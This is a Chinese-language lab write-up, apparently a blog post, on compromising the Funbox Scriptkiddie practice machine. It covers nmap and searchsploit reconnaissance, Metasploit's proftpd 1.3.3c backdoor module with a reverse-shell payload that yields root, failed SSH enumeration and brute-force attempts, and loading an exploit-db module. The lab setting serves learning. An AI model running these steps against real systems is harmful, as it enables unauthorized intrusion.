一、信息收集:
1、 扫描ARP信息:
└─# arp-scan –l
2、 使用nmap扫描端口,-sC使用默认脚本进行漏洞扫描:
└─# nmap -sC -sV -oA nmap/funbox 192.168.2.23
再扫描一下版本:
通过上面的信息可以看到:
(1) 系统为ubuntu,但是具体的版本不确定
(2) 系统开放了21端口,运行的软件为proftpd,版本为1.3.3c
(3) 系统开放了22端口,OpenSSH 7.2p2
(4) 系统开放了80端口,运行的是wordpress
(5) 系统还开放了110/139/143/445等端口。
3、 搜索是否有proftpd相关的漏洞
└─# searchsploit proftpd 1.3.3c
看到上面有两个结果,其中第2个为ruby脚本,可以直接利用。
二、漏洞利用
1、 现在进入msfconsole,查看一下:
msf6 > search proftpd
上面可以看到第5个:exploit/unit/ftp/proftpd_133c_backdoor.
先run一下,看到报错:[-] 192.168.2.23:21 - Exploit failed: A payload has not been selected.提示没有payload
2、 查看当前可以使用的payload:
show payloads
这里看到有8个payload可以使用,可以挨个测试一下,可以看到只有第4个可以使用
3、 使用cmd/unix/reverse 作为payload:
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.2.20
lhost => 192.168.2.20
4、 使用exploit –j进行利用:
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit –j
5、 获取shell,查看当前用户已经为root权限
三、靶机中的坑
这套靶机虽然比较简单,但是坑比较多,在学习的过程中遇到以下的问题:
1、 ProFtp适用的payload比较多,最开始测试了一下,没有连接就放弃了,然后进入更坑的地方;
2、 前面信息收集中发现一堆的端口及服务,OpenSSH发现有一个用户名枚举的漏洞:
经过测试无结果:
└─# python3 40136.py -e -U /home/kali/Desktop/tool/fuzz/dic/username.txt 192.168.2.23
3、 对FTP、SSH端口进行爆破,尝试半天没有结果
4、 80端口可以访问,在测试中发现有输入框,注意根据提示修改hosts文件进行域名解析,但是经过测试未发现信息
5、 80端口运行的是wordpress,使用wpscan进行扫描,发现xmlrpc.php文件
6、 网上查询可能可以利用,浏览器访问,但是需要修改为POST
然后根据网上的操作也无法利用。
四、MSF的其他记录
在前面通过searchsploit 搜索到有16921.rb这个文件,这个文件为ruby语言编写的文件,可作为msf的exploit模块使用,具体操作如下:
1、 将该文件拷贝至/usr/share/metasploit-framework/modules/exploits/目录下:
└─# cp /usr/share/exploitdb/exploits/linux/remote/16921.rb /usr/share/metasploit-framework/modules/exploits/.
└─# ll /usr/share/metasploit-framework/modules/exploits/16921.rb
-rwxr-xr-x 1 root root 1994 Sep 17 20:34 /usr/share/metasploit-framework/modules/exploits/16921.rb
2、 在msfconsole下使用reload_all加载该模块,然后再查看一下,看到这个模块了
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > reload_all
标签:Funbox11,proftpd,端口,192.168,exploit,Scriptkiddie,exploits,靶机,payload From: https://blog.51cto.com/u_9652359/7504072